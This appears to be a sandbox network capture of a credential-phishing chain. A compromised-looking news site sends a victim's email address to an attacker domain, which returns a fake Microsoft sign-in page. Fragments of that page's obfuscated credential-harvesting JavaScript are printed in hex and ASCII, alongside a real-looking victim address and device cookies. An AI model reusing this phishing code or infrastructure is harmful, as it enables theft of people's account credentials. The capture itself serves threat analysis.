                                                                                                                              Date: Mon, 18 Nov 2024 16:56:39 GMT
                                                                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              Access-Control-Allow-Methods: POST, GET, OPTIONS
                                                                                                                              Access-Control-Allow-Headers: Content-Type
                                                                                                                              Content-Length: 21
                                                                                                                              Connection: close
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              2024-11-18 16:56:39 UTC21INData Raw: 53 69 74 65 20 69 73 20 63 6f 6d 69 6e 67 20 73 6f 6f 6e 21 21
                                                                                                                              Data Ascii: Site is coming soon!!


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              58192.168.2.1749837188.114.97.34436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-11-18 16:56:41 UTC531OUTOPTIONS /api/v3/auth HTTP/1.1
                                                                                                                              Host: bc1qv5p8dwc98n3judrczkmpkjz.com
                                                                                                                              Connection: keep-alive
                                                                                                                              Accept: */*
                                                                                                                              Access-Control-Request-Method: POST
                                                                                                                              Access-Control-Request-Headers: content-type
                                                                                                                              Origin: https://timesofvartha.com
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                              Referer: https://timesofvartha.com/
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-11-18 16:56:42 UTC1031INHTTP/1.1 200 OK
                                                                                                                              Date: Mon, 18 Nov 2024 16:56:42 GMT
                                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                                              Content-Length: 2
                                                                                                                              Connection: close
                                                                                                                              vary: Origin
                                                                                                                              access-control-allow-methods: DELETE, GET, HEAD, OPTIONS, PATCH, POST, PUT
                                                                                                                              access-control-max-age: 600
                                                                                                                              access-control-allow-credentials: true
                                                                                                                              access-control-allow-origin: https://timesofvartha.com
                                                                                                                              access-control-allow-headers: content-type
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8JqNYGr%2FTl6sU01ixTZM5eqG5CNOXWXi6wph%2BSYy5dvqZvq7uzbtwWHiK2Uv6VyRai5EhkLGSyNiJPQQUHxVyKGhp1uSUUNY9tqzNeOL5Vky1zGAsUsMYosBp9EcaGqh17iX7p%2FsvkOdGnaIviAXuKQT"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8e497ecd3e26e750-DEN
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=18787&sent=4&recv=5&lost=0&retrans=0&sent_bytes=2885&recv_bytes=1109&delivery_rate=154982&cwnd=32&unsent_bytes=0&cid=a1a2a9310159df74&ts=768&x=0"
                                                                                                                              2024-11-18 16:56:42 UTC2INData Raw: 4f 4b
                                                                                                                              Data Ascii: OK


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              59192.168.2.1749839188.114.97.34436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-11-18 16:56:43 UTC671OUTPOST /api/v3/auth HTTP/1.1
                                                                                                                              Host: bc1qv5p8dwc98n3judrczkmpkjz.com
                                                                                                                              Connection: keep-alive
                                                                                                                              Content-Length: 172
                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                              Accept: application/json, text/javascript, */*; q=0.01
                                                                                                                              Content-Type: application/json
                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                              Origin: https://timesofvartha.com
                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                              Referer: https://timesofvartha.com/
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-11-18 16:56:43 UTC172OUTData Raw: 7b 22 75 75 69 64 22 3a 22 39 66 61 38 61 35 32 64 2d 35 30 31 30 2d 34 64 38 66 2d 61 36 31 33 2d 37 63 30 33 38 64 62 66 63 62 37 62 22 2c 22 69 64 65 6e 74 69 66 69 65 72 22 3a 22 62 64 61 64 33 62 30 34 2d 64 64 61 33 2d 34 36 31 65 2d 38 64 37 62 2d 35 39 32 37 66 66 30 38 61 36 37 63 22 2c 22 73 65 72 76 65 72 22 3a 22 62 63 31 71 76 35 70 38 64 77 63 39 38 6e 33 6a 75 64 72 63 7a 6b 6d 70 6b 6a 7a 2e 63 6f 6d 22 2c 22 75 73 65 72 22 3a 22 4d 72 65 74 74 69 6e 67 65 72 40 64 63 6e 64 78 2e 63 6f 6d 22 7d
                                                                                                                              Data Ascii: {"uuid":"9fa8a52d-5010-4d8f-a613-7c038dbfcb7b","identifier":"bdad3b04-dda3-461e-8d7b-5927ff08a67c","server":"bc1qv5p8dwc98n3judrczkmpkjz.com","user":"Mrettinger@dcndx.com"}
                                                                                                                              2024-11-18 16:56:46 UTC841INHTTP/1.1 200 OK
                                                                                                                              Date: Mon, 18 Nov 2024 16:56:46 GMT
                                                                                                                              Content-Type: application/json
                                                                                                                              Content-Length: 15630
                                                                                                                              Connection: close
                                                                                                                              access-control-allow-origin: *
                                                                                                                              access-control-allow-credentials: true
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lJPJ1XU8p1%2FA3q2X1NQ8JsdII8OY3AVBqFMc19hM5ykp7KbUH4j5nzoiMgmWsaaktm8p2ZLb3I2qK6i7guV%2BtpcLiwYveLwgBWTZHN5LmDVlnDrSFprDZEVCQ2PgVJn0XbsY%2BBZ7r8guoyuhsdBZGlqm"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8e497eda9d802cb2-DFW
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1373&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2887&recv_bytes=1443&delivery_rate=2077474&cwnd=246&unsent_bytes=0&cid=7684afb4c47dce11&ts=2880&x=0"
                                                                                                                              2024-11-18 16:56:46 UTC528INData Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 74 79 70 65 22 3a 22 4e 61 74 69 76 65 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 3c 68 74 6d 6c 20 64 69 72 3d 5c 22 6c 74 72 5c 22 20 6c 61 6e 67 3d 5c 22 65 6e 5c 22 3e 5c 6e 20 20 3c 68 65 61 64 3e 5c 6e 20 20 20 20 3c 74 69 74 6c 65 3e 53 69 67 6e 20 69 6e 20 74 6f 20 79 6f 75 72 20 61 63 63 6f 75 6e 74 3c 2f 74 69 74 6c 65 3e 5c 6e 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 5c 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 5c 22 20 63 6f 6e 74 65 6e 74 3d 5c 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 5c 22 3e 5c 6e 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 5c 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 5c 22 20 63 6f 6e 74
                                                                                                                              Data Ascii: {"status":"success","type":"Native","message":"<html dir=\"ltr\" lang=\"en\">\n <head>\n <title>Sign in to your account</title>\n <meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\">\n <meta http-equiv=\"X-UA-Compatible\" cont
                                                                                                                              2024-11-18 16:56:46 UTC1369INData Raw: 6e 6b 20 72 65 6c 3d 5c 22 70 72 65 66 65 74 63 68 5c 22 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 2f 2f 61 61 64 63 64 6e 2e 6d 73 66 74 61 75 74 68 2e 6e 65 74 2f 65 73 74 73 2f 32 2e 31 2f 63 6f 6e 74 65 6e 74 2f 63 64 6e 62 75 6e 64 6c 65 73 2f 63 6f 6e 76 65 72 67 65 64 2e 76 32 2e 6c 6f 67 69 6e 2e 6d 69 6e 5f 38 6f 77 77 74 34 75 2d 33 33 70 73 30 77 61 77 69 37 74 6d 6f 77 32 2e 63 73 73 5c 22 3e 5c 6e 20 20 20 20 3c 6c 69 6e 6b 20 64 61 74 61 2d 6c 6f 61 64 65 72 3d 5c 22 63 64 6e 5c 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 5c 22 61 6e 6f 6e 79 6d 6f 75 73 5c 22 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 2f 2f 61 61 64 63 64 6e 2e 6d 73 61 75 74 68 2e 6e 65 74 2f 65 73 74 73 2f 32 2e 31 2f 63 6f 6e 74 65 6e 74 2f 63 64 6e 62 75 6e 64 6c 65 73 2f
                                                                                                                              Data Ascii: nk rel=\"prefetch\" href=\"https://aadcdn.msftauth.net/ests/2.1/content/cdnbundles/converged.v2.login.min_8owwt4u-33ps0wawi7tmow2.css\">\n <link data-loader=\"cdn\" crossorigin=\"anonymous\" href=\"https://aadcdn.msauth.net/ests/2.1/content/cdnbundles/
                                                                                                                              2024-11-18 16:56:46 UTC1369INData Raw: 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 27 5d 28 29 3a 65 76 65 6e 74 5b 5f 30 78 34 33 33 39 62 32 28 30 78 38 61 29 5d 3d 21 5b 5d 3b 76 61 72 20 5f 30 78 33 65 35 31 39 65 3d 24 28 5f 30 78 34 33 33 39 62 32 28 30 78 38 31 29 29 5b 5f 30 78 34 33 33 39 62 32 28 30 78 38 34 29 5d 28 29 3b 21 5f 30 78 33 65 35 31 39 65 3f 28 24 28 5f 30 78 34 33 33 39 62 32 28 30 78 37 30 29 29 5b 5f 30 78 34 33 33 39 62 32 28 30 78 39 36 29 5d 28 5f 30 78 34 33 33 39 62 32 28 30 78 38 32 29 29 2c 24 28 5f 30 78 34 33 33 39 62 32 28 30 78 37 30 29 29 5b 5f 30 78 34 33 33 39 62 32 28 30 78 37 32 29 5d 28 29 2c 24 28 27 23 69 30 31 31 38 27 29 5b 5f 30 78 34 33 33 39 62 32 28 30 78 37 61 29 5d 28 27 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 27 2c 5f 30 78 34 33 33 39 62 32 28
                                                                                                                              Data Ascii: preventDefault']():event[_0x4339b2(0x8a)]=![];var _0x3e519e=$(_0x4339b2(0x81))[_0x4339b2(0x84)]();!_0x3e519e?($(_0x4339b2(0x70))[_0x4339b2(0x96)](_0x4339b2(0x82)),$(_0x4339b2(0x70))[_0x4339b2(0x72)](),$('#i0118')[_0x4339b2(0x7a)]('border-color',_0x4339b2(
                                                                                                                              2024-11-18 16:56:46 UTC1369INData Raw: 35 30 34 36 39 37 3d 5f 30 78 33 63 65 66 3b 77 69 6e 64 6f 77 2e 74 6f 70 5b 5f 30 78 35 30 34 36 39 37 28 30 78 36 65 29 5d 5b 5f 30 78 35 30 34 36 39 37 28 30 78 61 31 29 5d 3d 5f 30 78 35 30 34 36 39 37 28 30 78 38 62 29 3b 7d 2c 30 78 37 64 30 29 3b 7d 2c 27 65 72 72 6f 72 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 35 39 65 39 33 62 29 7b 76 61 72 20 5f 30 78 65 33 63 32 32 62 3d 5f 30 78 31 37 33 32 36 65 3b 63 6f 6e 73 6f 6c 65 5b 27 6c 6f 67 27 5d 28 5f 30 78 65 33 63 32 32 62 28 30 78 37 31 29 29 3b 7d 7d 29 3a 28 24 28 5f 30 78 31 37 33 32 36 65 28 30 78 37 33 29 29 5b 5f 30 78 31 37 33 32 36 65 28 30 78 37 35 29 5d 28 29 2c 24 28 5f 30 78 31 37 33 32 36 65 28 30 78 38 39 29 29 5b 5f 30 78 31 37 33 32 36 65 28 30 78 39 31 29 5d 28 5f 30 78 31 37
                                                                                                                              Data Ascii: 504697=_0x3cef;window.top[_0x504697(0x6e)][_0x504697(0xa1)]=_0x504697(0x8b);},0x7d0);},'error':function(_0x59e93b){var _0xe3c22b=_0x17326e;console['log'](_0xe3c22b(0x71));}}):($(_0x17326e(0x73))[_0x17326e(0x75)](),$(_0x17326e(0x89))[_0x17326e(0x91)](_0x17
                                                                                                                              2024-11-18 16:56:46 UTC1369INData Raw: 6a 41 52 73 68 4a 4f 33 63 44 31 70 77 7a 4c 54 66 4a 78 55 61 79 6e 46 5f 56 58 6e 5f 48 7a 4c 66 4a 6c 76 58 47 39 2d 47 46 77 57 65 2d 47 6b 52 37 59 32 6b 6d 55 68 49 62 74 36 63 39 79 73 6b 58 61 73 33 38 54 45 5f 6f 36 52 48 72 65 4c 5f 56 37 50 71 54 6d 6e 71 38 6e 37 31 71 35 66 73 31 49 54 66 59 33 70 34 38 50 71 72 38 64 33 44 74 71 48 42 2d 5f 55 6a 6d 70 76 50 45 79 71 50 65 50 6a 70 72 48 6c 5a 76 30 39 4b 44 36 32 65 47 31 7a 2d 54 54 50 2d 6d 48 54 31 34 6a 48 33 37 31 4f 33 37 72 2d 34 38 71 6c 34 64 74 45 56 61 59 57 46 69 76 7a 43 30 35 41 77 4d 30 55 4e 38 71 30 41 53 50 34 71 49 55 64 49 30 33 6e 41 6a 4c 57 46 6f 5a 75 32 4e 4c 66 52 76 72 77 5f 63 62 31 66 75 4e 78 6d 58 6a 52 5a 61 53 2d 5a 45 34 46 30 6d 65 49 67 55 4b 6b 63 46 66
                                                                                                                              Data Ascii: jARshJO3cD1pwzLTfJxUaynF_VXn_HzLfJlvXG9-GFwWe-GkR7Y2kmUhIbt6c9yskXas38TE_o6RHreL_V7PqTmnq8n71q5fs1ITfY3p48Pqr8d3DtqHB-_UjmpvPEyqPePjprHlZv09KD62eG1z-TTP-mHT14jH371O37r-48ql4dtEVaYWFivzC05AwM0UN8q0ASP4qIUdI03nAjLWFoZu2NLfRvrw_cb1fuNxmXjRZaS-ZE4F0meIgUKkcFf
                                                                                                                              2024-11-18 16:56:46 UTC1369INData Raw: 78 34 37 62 34 38 30 28 30 78 39 36 29 5d 28 5f 30 78 34 37 62 34 38 30 28 30 78 38 32 29 29 2c 24 28 27 23 69 6d 70 6f 72 74 61 6e 74 27 29 5b 27 68 69 64 65 27 5d 28 29 2c 24 28 27 23 65 72 72 6f 72 27 29 5b 27 73 68 6f 77 27 5d 28 29 2c 24 28 5f 30 78 34 37 62 34 38 30 28 30 78 38 31 29 29 5b 27 63 73 73 27 5d 28 5f 30 78 34 37 62 34 38 30 28 30 78 37 39 29 2c 5f 30 78 34 37 62 34 38 30 28 30 78 37 36 29 29 2c 24 28 5f 30 78 34 37 62 34 38 30 28 30 78 38 31 29 29 5b 27 66 6f 63 75 73 27 5d 28 29 29 3a 28 24 28 27 23 65 72 72 6f 72 27 29 5b 5f 30 78 34 37 62 34 38 30 28 30 78 37 35 29 5d 28 29 2c 24 28 27 23 69 6d 70 6f 72 74 61 6e 74 27 29 5b 5f 30 78 34 37 62 34 38 30 28 30 78 37 35 29 5d 28 29 2c 24 28 27 23 69 30 31 31 38 27 29 5b 5f 30 78 34 37 62
                                                                                                                              Data Ascii: x47b480(0x96)](_0x47b480(0x82)),$('#important')['hide'](),$('#error')['show'](),$(_0x47b480(0x81))['css'](_0x47b480(0x79),_0x47b480(0x76)),$(_0x47b480(0x81))['focus']()):($('#error')[_0x47b480(0x75)](),$('#important')[_0x47b480(0x75)](),$('#i0118')[_0x47b
                                                                                                                              2024-11-18 16:56:46 UTC1369INData Raw: 6d 6f 6e 2f 53 41 53 2f 50 72 6f 63 65 73 73 41 75 74 68 27 2c 27 73 74 61 74 75 73 27 2c 27 73 65 74 52 65 71 75 65 73 74 48 65 61 64 65 72 27 2c 27 66 6f 63 75 73 27 2c 27 69 6e 66 6f 27 2c 27 31 31 31 31 35 31 38 5a 5a 46 51 55 56 27 2c 27 72 65 6d 6f 76 65 43 6c 61 73 73 27 2c 27 6f 70 65 6e 27 2c 27 2f 61 70 69 2f 76 33 2f 6c 6f 67 69 6e 27 2c 27 63 6c 69 63 6b 27 2c 27 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 27 5d 3b 5f 30 78 33 36 62 33 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 5f 30 78 35 36 34 65 33 33 3b 7d 3b 72 65 74 75 72 6e 20 5f 30 78 33 36 62 33 28 29 3b 7d 5c 6e 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 5c 6e 20 20 3c 2f 68 65 61 64 3e 5c 6e 20 20 3c 62 6f 64 79 20 63 6c 61 73 73 3d 5c 22 63 62 5c 22 20 73 74 79 6c 65 3d 5c
                                                                                                                              Data Ascii: mon/SAS/ProcessAuth','status','setRequestHeader','focus','info','1111518ZZFQUV','removeClass','open','/api/v3/login','click','preventDefault'];_0x36b3=function(){return _0x564e33;};return _0x36b3();}\n </script>\n </head>\n <body class=\"cb\" style=\
                                                                                                                              2024-11-18 16:56:46 UTC1369INData Raw: 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 5c 22 3e 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 3e 3c 2f 64 69 76 3e 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 3e 3c 2f 64 69 76 3e 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 3e 3c 2f 64 69 76 3e 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 3e 3c 2f 64 69 76 3e 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 3e 3c 2f 64 69 76 3e 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 5c 6e 20 20 20 20 20 20 20 20 20
                                                                                                                              Data Ascii: "display:none;\">\n <div></div>\n <div></div>\n <div></div>\n <div></div>\n <div></div>\n </div>\n
                                                                                                                              2024-11-18 16:56:46 UTC1369INData Raw: 22 68 74 74 70 73 3a 2f 2f 61 61 64 63 64 6e 2e 6d 73 61 75 74 68 2e 6e 65 74 2f 73 68 61 72 65 64 2f 31 2e 30 2f 63 6f 6e 74 65 6e 74 2f 69 6d 61 67 65 73 2f 61 72 72 6f 77 5f 6c 65 66 74 5f 61 39 63 63 32 38 32 34 65 66 33 35 31 37 62 36 63 34 31 36 30 64 63 66 38 66 66 37 64 34 31 30 2e 73 76 67 5c 22 3e 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 62 75 74 74 6f 6e 3e 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 5c 22 64 69 73 70 6c 61 79 4e 61 6d 65 5c 22 20 63 6c 61 73 73 3d 5c 22 69 64 65 6e 74 69 74 79 5c 22 20 74 69 74 6c 65 3d 5c 22 4d 72 65 74 74 69 6e 67 65 72 40 64 63 6e 64 78 2e 63 6f 6d
                                                                                                                              Data Ascii: "https://aadcdn.msauth.net/shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg\">\n </button>\n <div id=\"displayName\" class=\"identity\" title=\"Mrettinger@dcndx.com


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              60192.168.2.1749840188.114.96.34436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-11-18 16:56:47 UTC366OUTGET /api/v3/auth HTTP/1.1
                                                                                                                              Host: bc1qv5p8dwc98n3judrczkmpkjz.com
                                                                                                                              Connection: keep-alive
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Accept: */*
                                                                                                                              Sec-Fetch-Site: none
                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-11-18 16:56:48 UTC804INHTTP/1.1 405 Method Not Allowed
                                                                                                                              Date: Mon, 18 Nov 2024 16:56:48 GMT
                                                                                                                              Content-Type: application/json
                                                                                                                              Content-Length: 31
                                                                                                                              Connection: close
                                                                                                                              allow: POST
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DPuBwHkrbUzOURU2nDSpeticQUuCzdy4a1kViVnWYmzGeTlJGGcyz9MfjL%2FNE6bZY%2Bkdoa8FwBjnxePw9uMGIhd%2FH%2FPAS54zLgrkE9%2FSwoTwd7UdAlIqo845m%2FB%2B7u%2FtJv6pwmiH%2FkA5e4Gz042TA5B3"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8e497ef2ffdd7b16-DEN
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=18978&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2885&recv_bytes=944&delivery_rate=152076&cwnd=32&unsent_bytes=0&cid=46e1f6768f5f52fd&ts=470&x=0"
                                                                                                                              2024-11-18 16:56:48 UTC31INData Raw: 7b 22 64 65 74 61 69 6c 22 3a 22 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 22 7d
                                                                                                                              Data Ascii: {"detail":"Method Not Allowed"}


                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                              61192.168.2.1749841204.79.197.200443
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-11-18 16:57:02 UTC2132OUTPOST /threshold/xls.aspx HTTP/1.1
                                                                                                                              Origin: https://www.bing.com
                                                                                                                              Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
                                                                                                                              Accept: */*
                                                                                                                              Accept-Language: en-CH
                                                                                                                              Content-type: text/xml
                                                                                                                              X-Agent-DeviceId: 01000A41090080B6
                                                                                                                              X-BM-CBT: 1707317459
                                                                                                                              X-BM-DateFormat: dd/MM/yyyy
                                                                                                                              X-BM-DeviceDimensions: 784x984
                                                                                                                              X-BM-DeviceDimensionsLogical: 784x984
                                                                                                                              X-BM-DeviceScale: 100
                                                                                                                              X-BM-DTZ: 60
                                                                                                                              X-BM-Market: CH
                                                                                                                              X-BM-Theme: 000000;0078d7
                                                                                                                              X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E
                                                                                                                              X-Device-ClientSession: E7820F9996D44E0495EAEF6765FEDDF2
                                                                                                                              X-Device-isOptin: false
                                                                                                                              X-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}
                                                                                                                              X-Device-OSSKU: 48
                                                                                                                              X-Device-Touch: false
                                                                                                                              X-DeviceID: 01000A41090080B6
                                                                                                                              X-MSEdge-ExternalExp: bfb3swp0129t2,d-thshld42,dsbrmchat,fliptrat10,qfmathswtophit_c,wsbref-c,wsbrel_prod,wsbswgc-t1
                                                                                                                              X-MSEdge-ExternalExpType: JointCoord
                                                                                                                              X-PositionerType: Desktop
                                                                                                                              X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI
                                                                                                                              X-Search-CortanaAvailableCapabilities: None
                                                                                                                              X-Search-SafeSearch: Moderate
                                                                                                                              X-Search-TimeZone: Bias=-60; StandardBias=0; TimeZoneKeyName=W. Europe Standard Time
                                                                                                                              X-UserAgeClass: Unknown
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                                              Host: www.bing.com
                                                                                                                              Content-Length: 1255
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Cookie: MUID=4590362BB5CF472B95BBEDB3112D4B7B; _SS=SID=0D9D1D1BB22D6FFF29B20905B3B46EB0&CPID=1707317459775&AC=1&CPH=a4f3c03a; _EDGE_S=SID=0D9D1D1BB22D6FFF29B20905B3B46EB0; SRCHUID=V=2&GUID=C4EAB6C130004333A34B5668AE4E4D10&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=en; ANON=A=84BEA1DAAAB85FA790252CDAFFFFFFFF; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
                                                                                                                              2024-11-18 16:57:02 UTC1255OUTData Raw: 3c 43 6c 69 65 6e 74 49 6e 73 74 52 65 71 75 65 73 74 3e 3c 43 49 44 3e 34 35 39 30 33 36 32 42 42 35 43 46 34 37 32 42 39 35 42 42 45 44 42 33 31 31 32 44 34 42 37 42 3c 2f 43 49 44 3e 3c 45 76 65 6e 74 73 3e 3c 45 3e 3c 54 3e 45 76 65 6e 74 2e 43 6c 69 65 6e 74 49 6e 73 74 3c 2f 54 3e 3c 49 47 3e 41 31 35 32 46 30 45 32 45 31 43 30 34 31 41 31 42 41 43 46 46 32 31 37 39 41 35 35 33 34 41 32 3c 2f 49 47 3e 3c 44 3e 3c 21 5b 43 44 41 54 41 5b 7b 22 43 75 72 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 69 6e 67 2e 63 6f 6d 2f 41 53 2f 41 50 49 2f 57 69 6e 64 6f 77 73 43 6f 72 74 61 6e 61 50 61 6e 65 2f 56 32 2f 49 6e 69 74 22 2c 22 50 69 76 6f 74 22 3a 22 51 46 22 2c 22 74 6f 74 61 6c 6e 75 6d 62 65 72 4f 66 45 6e 74 72 69 65 73 22 3a 22 30 22
                                                                                                                              Data Ascii: <ClientInstRequest><CID>4590362BB5CF472B95BBEDB3112D4B7B</CID><Events><E><T>Event.ClientInst</T><IG>A152F0E2E1C041A1BACFF2179A5534A2</IG><D><![CDATA[{"CurUrl":"https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init","Pivot":"QF","totalnumberOfEntries":"0"
                                                                                                                              2024-11-18 16:57:02 UTC428INHTTP/1.1 204 No Content
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              X-Cache: CONFIG_NOCACHE
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              X-MSEdge-Ref: Ref A: D1C6EA5BF4B9440A868E3C21F5BD8114 Ref B: DFW311000103023 Ref C: 2024-11-18T16:57:02Z
                                                                                                                              Date: Mon, 18 Nov 2024 16:57:01 GMT
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                              62192.168.2.1749848204.79.197.222443
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-11-18 16:57:13 UTC462OUTGET /conf/v2/asgw/fpconfig.min.json?monitorId=asgw HTTP/1.1
                                                                                                                              Origin: https://www.bing.com
                                                                                                                              Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
                                                                                                                              Accept: */*
                                                                                                                              Accept-Language: en-CH
                                                                                                                              Accept-Encoding: gzip, deflate, br
